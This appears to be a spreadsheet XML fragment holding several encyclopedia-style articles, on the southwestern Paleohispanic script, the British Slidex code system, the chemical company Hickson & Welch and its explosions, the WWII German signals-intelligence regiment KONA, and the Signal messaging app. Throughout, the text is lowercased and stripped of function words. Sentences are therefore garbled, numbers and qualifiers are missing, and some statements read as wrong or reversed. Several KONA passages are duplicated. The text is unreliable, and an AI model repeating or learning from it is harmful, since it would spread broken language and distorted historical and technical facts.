vowel. some scholars treat tartessian redundant semi-syllabary, others treat redundant alphabet. southwest script similar southeastern iberian script, considering shape signs value. main difference southeast iberian script show vocalic redundancy syllabic signs. this characteristic discovered ulrich schmoll allows classification great part southwestern signs vowels, consonants syllabic signs. inscriptions this script almost exclusively found almost hundred large stones (steles), lost 2014. most found modern-day portugal, particularly baixo alentejo, found spain. sixteen steles seen southwest script museum (museu escrita sudoeste, portuguese), almodôvar (portugal), stele total characters (the longest inscription found far) discovered 2008 also display.the inscriptions probably funerary purpose, even though lack well-recorded archeological contexts findings makes hard certain. this factor permit fixing precise chronology, placed within iron age, range around century bce. usual considering southwestern script ancient paleohispanic script. direction writing usually right left, also boustrophedon spiral. also paleohispanic scripts espanca script pre-roman peoples iberian peninsula prehistoric iberia timeline portuguese history cempsi saefs celtici notes references correa, josé antonio (1996): epigrafía sudoeste: estado cuestión», hispania prerromana, 65–75. correia, virgílio-hipólito (1996): escrita pré-romana sudoeste peninsular», ulisses viriato: primeiro milenio a.c., 88–94. ferrer jané, joan (2016): «una aproximació quantitativa l’anàlisi l’escriptura sud-oest», palaeohispanica 39–79. guerra, amilcar (2002): «novos monumentos epigrafados escrita sudoeste vertente setentrional serra caldeirao», revista portuguesa arqueologia 5–2, 219–231. hoz, javier (1985): origen escritura s.o.», actas coloquio sobre lenguas culturas paleohispánicas, 423–464. rodríguez ramos, jesús (2000): lectura inscripciones sudlusitano-tartesias», faventia 22/1, 21–48. schmoll, ulrich (1961) sudlusitanischen inschriften, wiesbaden. untermann, jürgen (1997): monumenta linguarum hispanicarum. tartessischen, keltiberischen lusitanischen inschriften, wiesbaden. valério, miguel (2008): origin development paleohispanic scripts: orthography phonology southwestern alphabet[1] external links tartessian south-lusitanian script jesús rodríguez ramos museu escrita sudoeste almodôvar website</t>
  </si>
  <si>
    <t>Slidex</t>
  </si>
  <si>
    <t>slidex hand-held, paper-based encryption system used low, front line (platoon, troop section) level british army cold period. replaced batco tactical code, which, turn largely made obsolete bowman secure voice radios. design slidex used series vocabulary cards arranged grid rows columns. each resulting cells word phrase, well letter number. latter allowed system spell words transmit numbers. cards stored folding case pair cursors facilitate locating cells. messages encrypted decrypted using code strips could placed holder along left side vocabulary card. blank vocabulary cards provided allow units create word specific mission. also encryption algorithm military intelligence further reading "the slidex code", cryptologia 8(2), april 1984 references photographs description slidex photographs slidex</t>
  </si>
  <si>
    <t>Hickson &amp; Welch</t>
  </si>
  <si>
    <t>hickson welch british chemicals company based castleford. history ernest hickson founded company 1893 introduce sulphur black sulphur dye) british cotton industry. 1915 hickson partners founded. foundation 1931 hickson welch founded, site destroyed 1930. from 1944 company made ddt, becoming uk's largest manufacturer. hickson welch (holdings) incorporated september 1951. made dyestuffs, (pesticide), timber preservatives. subsidiaries hickson welch ltd, hickson's timber impregnation (g.b.) ltd. timber subsidiary founded october 1946. timber preservative contained dinitrophenol, marketed triolith, tanalith pyrolith. pyrolith contained flame-proofing agent. public company became public company november 1951. company became known hickson international 1985.in august 1991 sold william blythe lancashire million holliday huddersfield. bought angus fine chemicals £22.3 million july 1992. closure august 2000 hickson international bought arch chemicals. time hickson employed 1,300 people, assets million, revenue £208 million. became known solutions closed july 2005. fired power station still remains. east wheldale colliery, opposite site jungle rugby league ground; castleford synonymous rugby league. explosions 1926 explosion november 1926 explosion occurred workers packing intermediate dye, thought non-explosive. died. 1930 explosion july 1930, noon, explosion site's nitration plant. destroyed factory, killing people injuring people. made houses town uninhabitable. ernest hickson later died (natural causes, july 1930) earlier company liquidated. inspector j.a.gee castleford west riding police, subsequently appointed george work following explosion. 1992 explosion september 1992, explosion factory killed five workers, injured around hundred people. 13.20 distillation column still base containing residues nitrotoluene ignited. fireball went site's control room killed instantly. fireball entered four-storey office block; woman would later injuries. explosion cost £3.5 million.it made schools area shut down. structure site next river aire castleford ings, north castleford, accessed a6032/a656 roundabout. site acres. eight hundred people employed castleford site. power station powergen (now e.on installed million turbine power station site. enel power built power station, 44mw general electric lm6000 engine. generation equipment built nuovo pignone. 13mw steam turbine, site producing around 56mw electricity. power station began operations october 2002. products wood protection furniture coatings organic chemicals references external links hickson welch (obsolete) e.on power station video clips site june 2005 demolition final structure 2011 1930 explosion</t>
  </si>
  <si>
    <t>Signal Intelligence Regiment (KONA)</t>
  </si>
  <si>
    <t>signal intelligence regiment (german: kommandeur nachrichtenaufklärung, lit. 'commander intelligence') (kona) basic element field organisation german army (heer) signals intelligence organization world kona regiment mobile communication reconnaissance units assigned army group operated close front lines within theatre operations intercept build intelligence, evaluation services (cryptanalysis) disseminate intelligence senior staff locally okh/gdna headquarters rear. quote world cryptographic historian, christos triantafyllopoulos: "the kona units ability solve complicated allied cryptosystems. instead focused exploiting low/mid level ciphers even capacity assisted material sent central cryptanalytic department. this german army high command's inspectorate 7/vi" sources remains signal intelligence regiment (abbr kona signals regiment surrendered american troops near tausing, located close northwest liezen, austria 1945. commanded fanatical nazi major ernst hertzer, remains regiment consisted around officers, enlisted women sent abbey stift tepl, used prisoner enclosure. they destroyed papers route except document considered important reconstruction records. remaining documents kept three briefcases plus single book. afternoon may, strong rumours russians approaching area, three briefcases burned book remaining. book remained unit vehicles extensive search never found.between 1945, prisoners screened town called konstantinsbad close plzeň czech republic. primary personnel interviewed, chosen questioning. some reports written plzeň ticom documents relating kona units written june oberursel near frankfurt main. further interrogations undertaken specific information given group moved revin. total, material created consisted reports supported supplements giving information makeup organization kommandeur nachrichtenaufklärung unit history kona operated southern sector russian front june 1941 1945, intercepting evaluating russian army, russian army people's commissariat internal affairs (nkvd) traffic. certain personnel within kona appeared succeeded reconstructing detailed order battle russian military, predicting timing location russian offensive occurred results achieved close integration sources information opposed cryptanalysis russian ciphers, although medium grade russian ciphers read. ratio general evaluation pure cryptanalysis three following: russian high grade ciphers generally unreadable, one-time pads. large amount information could obtained russian military practices, movements strategic reserves, chain command, intentions attack well including indicators ciphers, call-signs standard russian wireless discipline.from examination cryptographical processes russian security, kona appeared determined time pads used high grade ciphers, number code books recyphering tables used medium grade ciphers. medium grade ciphers appear cases within capability kona available reading.captain roman roessler, chief evaluator kona commanding officer intelligence evaluation centre (german: nachrichten aufklaerung auswertungsstelle) (abbr. nass) kona regiment, stated even identification individual formations possible, kona still successful formulating picture groupings number formations. regards russian rifle corps divisions, kona rely means gather signal intelligence kona successes considered overenthusiastic. organization functions kona regiment purpose kona regiment supply intelligence staff (military) army corps, armies army groups. each kona unit consisted regimental evaluation centre possibly intercept intelligence companies. kona regiment operated signal intelligence platoons operating close front line, companies situated close army main evaluation unit situated rear army group headquarters (abbr. hq). close range signal intelligence companies (german: nachrichten nahaufklärungskompanie) (abbr.nanak nak) tasked intercepting level traffic. these evaluated came intelligence passed senior staff assigned army group became available, intercepts immediate reports passed back evaluation platoon company headquarters, evaluation. long range signal intelligence companies (german: nachrichten fernaufklärungskompanie) (abbr. nafak fak) intercepted high level traffic, undertook immediate evaluation passed senior staff, also passed back reports intercepts regimental signal intelligence evaluation centre (german: nachrichten-aufklaerungs auswertestelle) (abbr. naas). 1944, signal intelligence battalion (german: :nachrichten aufklaerung abteilung) (abbr. naa) introduced organization kona. these battalions small administrative units, acted co-ordinate unit activities army level. major hertzer, commanding officer kona stated supervisors generally elderly soldiers, duty gather opinions make small adjustments close range signal, intelligence platoons, i.e. naz. colonel boetzel, head okh/gdna, stated effective improvement. signal intelligence evaluation centre (naas) signal intelligence evaluation centre (german: nachrichten-aufklärungs auswertestelle) (naas) centre situated close army group naas functionality included evaluation traffic analysis, cryptanalysis, collation dissemination intelligence. four types activity included evaluation traffic analysis intercepts:technical tactical evaluation (naas) naas centre situated close army group naas functionality included evaluation traffic analysis, cryptanalysis, collation dissemination intelligence. four types activity included evaluation traffic analysis intercepts:technical tactical evaluation identified intercepts, i.e. picked long range units. processing unidentified intercepts. traffic analysis long short range units including intercepts enemy armies. checking tactical evaluation reports short range units. traffic analysis, direction finding evaluation, update registry card index, nkvd evaluation russian force intercepts processing. cryptanalysis naas primarily meant solution unknown systems, study developments known systems, work nkvd ciphers processes. naas worked 4-figure russian ciphers. naas responsible dissemination intelligence, passing results intelligence officer associated army group, also forwarding intelligence signal intelligence agency okh/gdna naas position direction coverage interception. through chain command, controlled intercept coverage lower units co-ordination staff headquarters okh/gdna controlling everything else certain items passed unprocessed straight gdna cryptanalysis unit. ciphers nkvd formatted using 5-figure groups passed automatically gdna cryptanalysis unit additional cryptanalysis. stationary intercept company (feste) stationary intercept companies (1923–1939 german: feste horchstelle, 1939–1945 german: feste nachrichten aufklaerungsstelle) (abbr:feste commonly fnast) designed work lower level naas, i.e. army. intercepts designed pre-war period, although retained, traditional functionality designation fixed (german: feste horchstelle) single location redesigned become semi-motorized east russian campaign later. feste stationary company kona operated close army hqfeste consisted five sections, besides section. intercept platoon, controlled naas, covered unknown traffic 3500-5500 band, fixed nkvd nets assigned naas formations mobile network traffic directed naas. evaluation section identified reported unknown traffic. study unidentified intercepts primary function feste. cryptanalysis section worked identify cipher keys, translation plain-text messages solutions cyphers. feste also direction finding platoon, provided resources demand. communications direction finding sites regiment provided communications platoon, passed results back naas telegram teleprinter. long range intelligence company (fak) these companies (german: nachrichten fernaufklaerungs kompanie) (abbr:fak) different feste, concerned greater degree identified traffic. like feste, semi motorized designed operate close army they designed manner unit associated army staff covering army section. reality however, operations types companies, indeed feste, took place rear. large amount work needed undertaken became heaviest time safety precautions required withdrawal, meant found practical undertake work rear would less frequently interrupted. gathering intercepts, fak's directed cover control section evaluation centre (naas). traffic intercepts received unit studied fully resources allowed. plain-text messages translated, intercepts known ciphers decoded specialists attached unit. card index section maintained archivist. those intercepts analysed cryptanalysis forwarded traffic analysis section naas. close range intelligence company (nak) close range company (german: nachrichten nahaufklaerungs kompanie) (abbr:nak), worked army corps level. primary task intercept traffic work low-level possibly digit ciphers traffic close front lines. although unit designed work army group level, practice companies also stationed commander regiment army well. contrast long range companies, units designed operate platoon. operation company divided amongst four platoons were, (german: horchzug) intercepted traffic, (german: peilzug) bearings fixes enemy transmitters, evaluation (german: auswertezug) (german: sendezug), handled communication problems. direction finding platoon whose organization particularly elaborate, operated tents.normal direction finding operations company called average eight out-stations, spaced kilometres parallel front several hundred kilometres. from outstation 20-30 kilometers. each station mobile moved fighting moved. communications wire would sometimes available, mostly wireless. normal days operations used approximately receivers, different designs types, according frequency range listened too. antennas usual inverted type, averaging metres length, metres high. masts antennas metres high always carried, effort always made find longer masts locally. receivers powered exclusively batteries. gasoline driven generators used power transmitters. attached platoon small evaluation section, consisting evaluators generally operated captured house tent near intercept station results passed evaluation platoon company. only simplest systems worked level, majority intercepts passed naas, studied intercepts using cryptanalysis well tactical intelligence derivable traffic analysis. close range signal intelligence platoons (naz) each close range company usually three close range signal intelligence platoons (german: nachrichten nahaufklaerungszug) (abbr. naz), designed work still army corps level. signal intelligence battalion (naa) signal intelligence battalion (german: nachrichten aufklaerung abteilung) (abbr. naa) introduced organization kona, 1944, considered improvement operational model radio intercept. these battalions small administrative units, acted co-ordinate unit activities army level. supervisors generally elderly soldiers, whose duty gather opinions make small adjustments close range signal intelligence platoons, i.e. naz. colonel boetzel, head okh/gdna, stated effective improvement. operations direction finding direction finding (d/f) perhaps greatest importance signal intelligence activities, enabled location enemy. importance increased russian radio discipline, code cypher security improved latter half war. kona employed personnel forward platoon personnel stationed feste (the long range intercept unit).the naas evaluation section received intercepts sections nak. sent requests long range also close range direction finding sites. 617, covered russian ukrainian front, example, sent orders three four long range direction finding sites close range units. reported back using enciphered wireless signals.long range sets located 200-350 kilometres behind front line. three sets particular spot constituted group. supervisor worked company level working intercept room issued requests. through means, simultaneous fixes could taken frequently three sites.close range sets located platoon level. these sets received requests long range companies also close range headquarters. direction finding techniques site chosen unit favourable good radio reception minimum magnetic declination. each unit included operators, received messages teams, second acted intercept operator, relaying intercepts back naas. three sets place constituted group operated particular company. results reported back w/t.the operators acquire adeptness rotating loop antenna point minimum volume, ascertaining width band minimum response, computing exact azimuth marginal readings. moreover, operations carried exceptional speed, since often call signs acknowledgement lasting seconds could intercepted. extreme care exercised ensure naas operators deceived. each operator used report form entered information regarding time, frequency, call sign, fragments intercepted messages, well azimuths obtained.to dispatch teams transmitter intercept centre used. operator stated frequency call sign station located number team, azimuth thus taken could later confirmed checking. teletype communication available, data forwarded evaluation centre radio. history kona units kona kona operated vicinity lviv, later vinnytsia, poltava, reichshof towards war, czechoslovakia area.to kona headquarters subordinated: signal intelligence evaluation centre naas stationary intercept company fest close range signal intelligence company preuss signal intelligence battalions subordinated: long range signal intelligence company close range signal intelligence company 953to subordinated: long range signal intelligence company close range signal intelligence company headquarters headquarters unit kona worked army group consisted commandant kona, adjutant, chief operations, paymaster, technical inspector, clerks truck drivers. following statistics show breakdown unit naas naas kona major operation subdivisions: section engaged evaluation traffic analysis, section cryptographic activities. there also section, communication line section, truck drivers section, communication line section section truck drivers. number personnel totalled officers, enlisted enlisted women divided follows: feste stationary intercept company, feste long range signal intelligence companies, 623, similar organization operation. each section, monitoring platoons, evaluation section, cryptanalytic section communication platoon. difference feste minor. feste less mobile fak, eight truck drivers, instead assigned 623. following tables show subsections strengths feste 623. following tables show subsections strength feste following described layout feste following described layout 617: following table describes layout 623: close range sigint company, 954, also managed split number subsections. operated platoons, platoon attached army corps. strength platoon men, approximately used radio telephone intercept, radio intercept, evaluation. rest platoon compromised clerks, drivers cooks. 953, september 1944, subordinated kona time moved west, leaving behind interpreters cryptanalysts, continued serve eastern front. benold, named commanding officer, composed specialists various kinds drawn sigint companies subordinate kona company, formed part preuss formed forces withdrawn units kona this close range company was, contrast companies, subordinated directly kona headquarters. september 1944, subordinated kona time moved west, leaving behind interpreters crypt analysts, continued serve eastern front. benold benold, named commanding officer, composed specialists various kinds drawn signal intelligence companies subordinate kona company formed part preuss preuss, taking name benold, formed forces withdrawn units kona this close range signal company was, contrast companies, subordinated directly kona kona kona operated warsaw, barysaw, orsha, vitebsk, smolensk, minsk, grodno, szczytno, gdańsk finally holstein. kona organization known detail. following order battle: signal intelligence evaluation centre, naas signal intelligence battalions, 6,naa stationary intercept company, feste long range signal intelligence companies, 610, 619, close range signal intelligence companies, 951,955,958in february 1945, components kona split; part remained kona reassigned army group north army group weichsel; part attached kona nord, took place kona army group north. original components divided kona following way: kona long range signal intelligence companies, 610, close range signal intelligence company, stationary intercept company, feste 7kona nord:1 long range signal intelligence company, close range signal intelligence platoon, brutus close range signal intelligence companies, 951, signal intelligence evaluation centre, naas 2this remained general structure march 1945, order general albert praun return kona nord units kona except close range signal intelligence companies 951, kona kona composed (10), (possibly 611, transferred west kona october 1944), nak, feste. nothing known kona ended caught russians pocket kurland, region latvia, towards captured intact army kona operated riga, pskov courland caught courland pocket. kona kona subordinated commanding officer southeast, südost (german: befehlshaber suedost), controlled german armies balkans these armies responsibility occupational force kona added normal task intercepting long range traffic emanating middle east africa, i.e. monitoring traffic occupied balkan countries. reason kona included mobile long range signal intelligence companies mobile close range signal intelligence companies. units belonging kona naas feste, feste feste naas naas code name hasso, stood (german: horchauswertestelle suedost) (listening southeast), intercept evaluation station southeast naas divided cryptanalysis section, section, tactical final evaluation sections. naas unit around men, including interpreters, decoders, cryptanalysts, evaluators, draughtsmen, drivers, telephonist wireless operators. feste feste former army fixed intercept station graz. unit sections: radio intercept section. radio operation maintenance section radio transmitter. cryptanalysis section. evaluation section activities.the unit headcount around operated around radio intercept sets. usual staff prevalent kona feste. feste feste former army fixed intercept station tulln. strength around personnel similar sectioned layout feste kona close range signal intelligence platoons: consisted men, among turkish linguists, cryptanalysts interpreters. following layout: platoon radio intercept station sets. radio maintenance section platoon cryptanalysis section turkish communications final evaluation section consisted personnel specialized monitoring internal balkan radio traffic, based belgrade collect decode traffic general draža mihailović marshall josip broz tito. organized follows: platoon radio intercept station. radio maintenance section platoon cryptanalysis section final evaluation section d/fthe kona unit radio controlled station, broadcast monitoring point (german: rundfunkueberwachungstelle) part kona dissolved 1942. kona kona located western front much world unit type located there, establishment kona february 1943. before february 1944, kona organization consisted naas feste well long range signal intelligence companies, sometime february 1944, kona changed. reorganisation kona follows change german order battle took place western front early 1944. prior time, western armies command army group kona attached. however, early 1944, army group absorbed west (german: oberbefehlshaber west) took control three newly formed army groups western front, army group army group army group kona reorganized contained: three naa: attached army group army group army group regard subordination component parts kona three units, disagreement combined services detailed interrogation centre publication ticom interrogation report.according ticom report: feste combined feste form feste combined form there indication whether combined companies formed kona organization remained constant throughout 1944. late 1944, attempt made centralize strengthen western field organization. senior communication intelligence officer (german: hoeherer kommandeur nachrichten aufklaerung) (abbr. hoeh established. commander, colonel kopp attached west (german: oberbefehl-shaber west) made responsible signal intelligence activities west western field organisation strengthened moving kona eastern front western front join kona both kona units subordinated colonel kopp: kona assigned army group controlled german armies southern western front, kona attached army group controlled german armies northern western frontwith kona move west, kona organization modified. signal intelligence battalions reduced two, composed stationary intercept companies: feste long range signal intelligence company: 613, taken kona broken individual components reassigned. feste placed direct supervision colonel kopp; feste shifted norway italy, fell kona assigned kona kona compensated loss addition 626, taken eastern front kona, (perhaps kona brought western front.during spring 1945, kona organized evaluation centre: naas battalions: stationary intercept company: feste long range signal intelligence company: subordinated signal intelligence company: 626. this organisation kona capitulation. naas naas located close paris saint-germain-en-laye. unit personnel, consisting interpreters, cryptanalysts, evaluators, draughtsman, switchboard operators telephonists, drivers, clerks. addition, women auxiliaries available, particularly telephonist switchboard work. internal organization naas known feste unit subordinated naas early 1944, joined feste form feste organisation consisted radio intercept platoon, telephone communication unit. when attached naas feste cryptanalysis evaluation personnel since work done naas strength feste estimated women auxiliaries feste according prisoner's account organization feste former army (wehrmacht) intercept station münster, closely approximated feste radio intercept platoon, platoon, evaluation platoon consisting sections: evaluation content messages, content evaluation (german: inhaltsauswertung) evaluation traffic, traffic analysis (german: verkehrsauswertung). 1944, feste combined feste form when broken november 1944, feste subordinated directly senior commander signal intelligence west, major general william gimmler. feste feste original army intercept station euskirchen. early subordinated kona administered independently 1944, combined feste form when kona reorganized fall 1944, feste combined long range signal intelligence company: 626, brought eastern front form this organization valid internal organization feste described liaison officer, hans lehwald, attached stated consisted radio reception platoon approximately receivers, evaluation platoon 25-30 men. evaluation broken section traffic analysis, cryptanalysis, evaluation, filing section diagrams nets, call signs, personalities, code names results feste feste stationary intercept company formed frankfurt spring 1942 sent norway july year. first stationed trondheim, later bergen, spring 1944 near oslo. between summer 1944 following winter, personnel moved italy christmas 1944, nothing left unit norway while norway, feste organized along lines long range signal intelligence company, platoon, intercept platoon· bo-120men, platoon, radio reconnaissance platoon men, evaluation section men. evaluation section subsection evaluation message contents traffic, cryptanalysis when norway, feste was, subordinated kona surmised, however, connection kona always flexible units geographical position norway. when broken feste remained supervision kona shifted italy kona formed montpellier april 1943 attached kona february 1944, subordinated kona late autumn combined feste form reorganized unit composed intercept platoon evaluation platoon. transport, said approximately vehicles special french radio trucks trailers equipment. strength company roughly including interpreters, code clerks, cryptanalysts, radio intercept operations drivers. belonged kona known inception. february 1944 combined feste feste form when battalion broken late 1944, reassigned kona remained war. little known organization organization paralleled 624. established august 1943, trained january 1944 activated winniza. original mission originally interception traffic french army, american army later 1st, american armies. subordinated eastern kona, perhaps kona stationed ukraine. october 1944, sent landau tutored western traffic reorganized. november 1944, landau, units sent west kona remained war. strength russian front around 250-300 80-100 intercept operators, 10-15 operators, 10-15 cryptanalysts, translators, traffic analysts. unit greatly strength western front. kona kona created activated eastern kona frankfurt 1941 stationed crimea work caucasian campaign. after campaign, reassigned work interception russian partisan traffic. this remained task kona reassigned work western front. there little information kona east. western kona, signal intelligence battalions: brought east november 1944. subordinated close range signal intelligence company: 956, established october 1944 long range signal intelligence company: 611, brought east time. assigned kona kona long range signal intelligence company: 613. subordinated also brought east november 1944; reassigned east also october 1944. 613. given kona kona late 1944. nothing known organization unit, likely long range signal intelligence companies. 611. 6111 active eastern front russian campaign june 1941. also stationed poland, attached army group centre. november 1944, moved western front subordinated kona nothing known size eastern front. western front, small enough occupy house zutphen, netherlands. consisted 30-40 radio telephone operators, cryptanalysts decoders, evaluators 610. activated 1940 operations eastern front subordinated kona worked tilsit september 1940 later settled volkhov, intercepted russian traffic. november 1944, transferred western front subordinated kona operated rostov-on-don, novocherkassy, minsk, reorganized partisan traffic. disbanded 1944, assigned okh/chi maybach bunker zossen. kona kona established february 1943 subordinated commander-in-chief south süd), albert kesselring controlled armies italy. 1944, kona made unit. signal intelligence evaluation centre: code-name krimhilde stationary intercept companies: feste feste code-names monika astrid long range signal intelligence company: code-name erikanaas 7naas organized cryptography, cryptanalysis, evaluation. evaluation sections included immediate, tactical, d/f, traffic, content, final evaluation. strength evaluation centre men. feste 1feste former army intercept station stuttgart, stationed strasbourg 1940, brittany 1941, later year montpellier, later moved italy attached kona 1943 main task feste interception. evaluation done personnel consisted radio intercept operations, telegraph telephone operators operators. feste 9the origin feste described kona 621fak created 1942 remnants former intercept (german: horch kompanie) company: bielefeld. most original captured north african campaign july 1942. remnants company continued work allied systems 1943, allies captured unit tunisia nothing known organization company. kona kona formed october 1944, assigned eastern front army group south. evaluation centre: naas signal intelligence battalions, long range battalion: 620, close range signal intelligence company whose identity unknown, stationary intercept company, either feste feste known feste attempted winter 1942-3 intercept russian radio telephone traffic königsberg, certain eastern kona feste assigned.kona operated odessa, romania, croatia, finally linz. monitored western traffic norderney island august 1939 sent eastern front subordinated kona nothing known units. kona nord kona nord created february 1945 serve army group north kona attached group, transferred army group weichsel. from kona kona nord received naas 619, 951, 955, brutus. this organization valid 28th match 1945, order general albert praun, kona nord ordered return army group weichsel components except close range signal intelligence companies: 955. these probably remained kona nord capitulation. field unit unique general nachrichtenaufklärung organization. although assigned 20th mountain army (german: gebirgsarmee) command generaloberst eduard dietl. matters signal intelligence independent unit subordinated directly intercept control station east (hls ost) acting respects like signal intelligence regiment. units mission obtain signal intelligence russians, mostly intercept.the original core long range signal intelligence platoon designated north (german:nachrichten fernaufklaerungszug nord) (abbr. nord) operated finland 1941. march 1944, nord merged close range signal intelligence company, form increased units strength 300.one important accomplishments nord breaking enemy codes, specifically russian later, allied swedish codes. russian codes, e.g. built another. previous traffic experience therefore utilized 1941 1945. maintained extensive card catalogue 6000 cards.the distribution tasks nord unit follows: nord produced types reports: daily news report (german: tagesmeldungen) enemy situation report (german: feindlagemeldungen)the report distributed chief staff, commander 20th mountain army, general nachrichtenaufklärung teleprinter.in autumn 1944, finland's capitulation, retreated norway. 1945, located gjøvik, norway, ordered turn documents paper 20th mountain army organize group would incorporate experience knowledge unit. this party became known norway party published reports became ticom documents i-55 i-106. evaluation cryptanalysis kona regiment evaluation naas main duty naas evaluate enemy traffic intercepted passed long range close range signal intelligence companies. captain roessler, chief evaluator kona commanded officer naas, observed that: "there prescribed rules evaluation, fact, determined material dealt with, made success failure signal intelligence service personal matter depending perspicacity experience specialists persons operating positions".evaluation naas concerned observation interpretation known radio nets, study unidentified traffic results cryptanalysis. roessler emphasized case kona "the interpretation unknown traffic was...for long term intelligence point view, chief evaluation problem".comprehensive research work necessary systematize evidence available, basic instruments systemic knowledge system card indexes. fundamental principle, established much difference opinion, smallest detail serving characterize identify allies traffic carded: resultant card index served varied purposes. mass material intercepted compelled step; firstly aide-mémoire, secondly careful record characteristics became increasingly urgent increasing russian security, sources available interpretation became continually less numerous. towards war, therefore, card indexes considerably extended, despite economies personnel material.in accordance principles, companies provide detailed reports. smoothly functioning report system chief problem discussed almost meetings consider organisation. long range signal intelligence company needed average typists hours daily report naas. reporting system covered following fields (whether writing, courier, teleprinter telephone) report traffic nets (call-signs, frequency, traffic workings, keys used, characteristics) report content signals. technical signals reportsreports companies, collated naas, gave complete picture traffic intercepted day. important conclusions, i.e. tactical value, deduced traffic relations content messages, collected daily situation report (german: lagemeldung). work naas hardly reflected situation reports, intercept operator heard great deal enemy traffic assigned greater percentage intercept traffic identified, naas, deal necessarily traffic russian armed forces. card indexes bear problem.comprehensive research work served generalise and/or systematise detailed evidence carried point view. further material served identification included: names (including heard radio broadcasts) cover-names. 5-figure characteristics. results coordinates usage contents decoded signals. technical characteristicsthe part played decoded messages total success signal intelligence diminished steadily towards war. intelligence greatest tactical value drawn mostly sources, e.g. 5-figure characteristics,map coordinates. large, signal intelligence, gave almost complete picture groupings russian forces, fronts (army groups_ armies, corps level.the strategic mobile formations, i.e. armour cavalry, continuously covered. when formations could completely identified, perhaps camouflage measures, overall groupings number available formations still clear. rifle corps divisio</t>
  </si>
  <si>
    <t>Signal (software)</t>
  </si>
  <si>
    <t>signal cross-platform centralized encrypted instant messaging service developed non-profit signal foundation signal messenger llc. users send one-to-one group messages, include files, voice notes, images videos. also used make one-to-one group voice video calls, android version optionally function app.signal uses standard cellular telephone numbers identifiers secures communications signal users end-to-end encryption. client software includes mechanisms users independently verify identity contacts integrity data channel.signal's software free open-source. mobile clients published gpl-3.0-only license, desktop client server published agpl-3.0-only license. official android generally uses proprietary google play services (installed android devices), though designed still work without installed. signal also official client desktop programs windows, macos linux (although registration requires android device).the non-profit signal foundation launched february 2018 initial funding million brian acton. january 2021, platform approximately million monthly active users. 2021, downloaded million times. history 2010–2013: origins signal successor redphone encrypted voice calling textsecure encrypted texting program. beta versions redphone textsecure first launched 2010 whisper systems, startup company co-founded security researcher moxie marlinspike roboticist stuart anderson. whisper systems also produced firewall tools encrypting forms data. proprietary enterprise mobile security software available android. november 2011, whisper systems announced acquired twitter. neither company disclosed financial terms deal. acquisition done "primarily marlinspike could help then-startup improve security". shortly acquisition, whisper systems' redphone service made unavailable. some criticized removal, arguing software "specifically targeted help] people repressive regimes" left people like egyptians dangerous position" events egyptian revolution 2011.twitter released textsecure free open-source software gplv3 license december 2011. redphone also released license july 2012. marlinspike later left twitter founded open whisper systems collaborative open source project continued development textsecure redphone. 2013–2018: open whisper systems open whisper systems' website launched january 2013.in february 2014, open whisper systems introduced second version textsecure protocol (now signal protocol), added end-to-end encrypted group chat instant messaging capabilities textsecure. toward july 2014, announced plans merge redphone textsecure applications signal. this announcement coincided initial release signal redphone counterpart ios. developers said next steps would provide textsecure instant messaging capabilities ios, unify redphone textsecure applications android, launch client. signal first enable end-to-end encrypted voice calls free. textsecure compatibility added application march 2015. from launch 2010 march 2015, android version signal (then called textsecure) included support encrypted sms/mms messaging. from version 2.7.0 onward, android application supported sending receiving encrypted messages data channel. reasons included security flaws sms/mms problems exchange. open whisper systems' abandonment sms/mms encryption prompted users create fork named silence (initially called smssecure) meant solely exchange encrypted messages.in november 2015, textsecure redphone applications android merged become signal android. month later, open whisper systems announced signal desktop, chrome could link signal mobile client. launch, could linked android version signal. september 2016, open whisper systems announced signal desktop could linked version signal well. october 2017, open whisper systems announced chrome deprecated. time, announced release standalone desktop client (based electron framework) windows, macos certain linux distributions.on october 2016, american civil liberties union (aclu) open whisper systems published series documents revealing received subpoena requiring provide information associated phone numbers federal grand jury investigation first half 2016. only phone numbers registered signal, service designed, able provide "the time user's account created last time connected service". along subpoena, received order requiring tell anyone subpoena year. approached aclu, able lift part order challenging court. said first time received subpoena, committed treat "any future requests way".in march 2017, open whisper systems transitioned signal's calling system redphone webrtc, also adding ability make video calls mobile apps. since 2018: signal technology foundation february 2018, moxie marlinspike whatsapp co-founder brian acton announced formation signal technology foundation, 501(c)(3) nonprofit organization whose mission support, accelerate, broaden signal's mission making private communication accessible ubiquitous". acton started foundation million funding became foundation's executive chairman leaving whatsapp's parent company facebook september 2017. marlinspike continued signal messenger's first ceo. 2020, signal entirely donations, nonprofit.between november 2019 february 2020, signal added ipad support, view-once images videos, stickers, reactions. they also announced plans group messaging system "experimental method storing encrypted contacts cloud."signal reportedly popularized united states george floyd protests. heightened awareness police monitoring protesters platform communicate. black lives matter organizers used platform "for several years". during first week june, encrypted messaging downloaded five times week prior murder george floyd. june 2020, signal foundation announced feature enables users blur faces photos, response increased federal efforts monitor protesters.on january 2021, signal surge user registrations, temporarily overwhelmed signal's capacity deliver account verification messages. macrumors linked surge whatsapp privacy policy change signal endorsement elon musk edward snowden twitter. international newspapers reported similar trends united arab emirates. reuters reported 100,000 people installed signal january.between january 2021, number signal installations listed google play increased million million. january 2021, surge users, signal overwhelmed traffic users. afternoon january, signal announced twitter service restored.on january 2022, moxie marlinspike announced stepping role signal messenger. continues remain signal foundation's board directors brian acton volunteered serve interim search ceo. usage numbers signal's userbase started 2010, predecessor textsecure launched whisper systems. according annie, signal approximately million monthly active users december 2020. january 2022, reported signal used million people. developers funding development signal predecessors open whisper systems funded combination consulting contracts, donations grants. freedom press foundation acted signal's fiscal sponsor. between 2013 2016, project received grants knight foundation, shuttleworth foundation, almost million government–sponsored open technology fund. signal developed signal messenger llc, software company founded moxie marlinspike brian acton 2018, wholly owned tax-exempt nonprofit corporation called signal technology foundation, also created 2018. foundation funded initial loan million acton, support, accelerate, broaden signal's mission making private communication accessible ubiquitous". organization's products published free open-source software. features signal allows users make one-to-one group voice video calls people ios, android, desktop. calls made wi-fi data connection (with exception data fees) free charge, including long distance international. signal also allows users send text messages, files, voice notes, pictures, gifs, video messages wi-fi data connection signal users ios, android desktop program. platform also supports group messaging. communications signal users automatically end-to-end encrypted (the encryption keys generated stored phones, servers). verify correspondent really person claim signal users compare fingerprints scan codes) out-of-band. platform employs trust-on-first-use mechanism order notify user correspondent's changes.on android, users making signal default sms/mms application, allowing send receive unencrypted messages addition standard end-to-end encrypted signal messages. users application communicate contacts signal.textsecure allowed user passphrase encrypted local message database user's encryption keys. this encrypt user's contact database message timestamps. signal applications android locked phone's pin, passphrase, biometric authentication. user define "screen lock timeout" interval, providing additional protection mechanism case phone lost stolen.signal also allows users timers messages. after specified time interval, messages deleted sender's receivers' devices. time interval five seconds week long, timer begins recipient read copy message. developers stressed meant collaborative feature conversations participants want automate 